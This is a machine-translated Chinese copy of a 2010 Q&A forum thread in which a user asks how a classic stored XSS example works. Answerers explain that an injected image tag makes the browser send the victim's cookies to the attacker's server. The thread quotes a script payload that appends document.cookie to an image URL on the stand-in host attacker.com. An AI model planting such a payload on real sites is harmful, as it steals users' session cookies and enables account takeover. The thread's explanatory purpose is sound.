2010-04-12 96 views
1

的:問題從<a href="http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt" rel="nofollow noreferrer">http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt</a>援引型XSS攻擊


如同這裏許多可能知道,目前的XSS攻擊通常有兩種形式: 1 - 攻擊者上傳標籤公共bulliten板,博客,或其他網站 有XSS漏洞,並有很多其他用戶將訪問。攻擊者通常 收成後用戶模仿網站的Cookie,但表單提交和其他攻擊 有時利用。這就是我所說的許多人認爲XSS是。 下面是一個例子:

有人將張貼在evilblog.com以下,其他用戶將處理

<script>document.write("<img src=http://attacker.com/」 + document.cookie + 「>」)</script> 

這將盡量拉的圖像攻擊者的服務器與用戶的evilblog cookies在URL 。


我的問題:

我不明白上面被寫圖像URL路徑的目的/結果。任何人都可以詳細說明這一點嗎?

PS:這是什麼意思爲「這會盡量拉的圖像攻擊者的服務器的URL用戶的evilblog曲奇」

回答

2

執行document.write()只是增加了一個img標籤的網站,瀏覽器將嘗試從URL加載圖像。

腳本和框架時,他們來自不同的領域有時會堵塞這樣的XSS攻擊會在這種情況下失敗。圖像通常是允許的,因爲許多網站無論如何都顯示來自不同主機的圖像,所以XSS攻擊將成功。

結果是攻擊者的條目記錄包含Cookie信息,並且因爲它通常沒有返回它解釋爲一個殘缺的圖像所以大多數瀏覽器顯示任何與用戶不會懷疑什麼。

+0

關於使用圖像的透徹解釋。謝謝。 – Ricky 2010-04-12 11:17:48

1

的目的是,圖像會自動被瀏覽器獲取的;在示例中,cookie的詳細信息在查詢字符串中設置爲該URL,因此攻擊者獲取URL,獲取cookie,從而獲取身份驗證所需的詳細信息。

+0

所以「attacker.com」是指對被攻擊? – Ricky 2010-04-12 11:10:39

+1

@Ricky:不,「attacker.com」是攻擊者控制的網站。因此,他們將檢查其網站的HTTP日誌,並在那裏查看該請求的詳細信息(即*他們的*網站上)。 – 2010-04-12 11:12:06

1

簡單。它向請求的URL中包含cookie的惡意域發起請求。

相關問題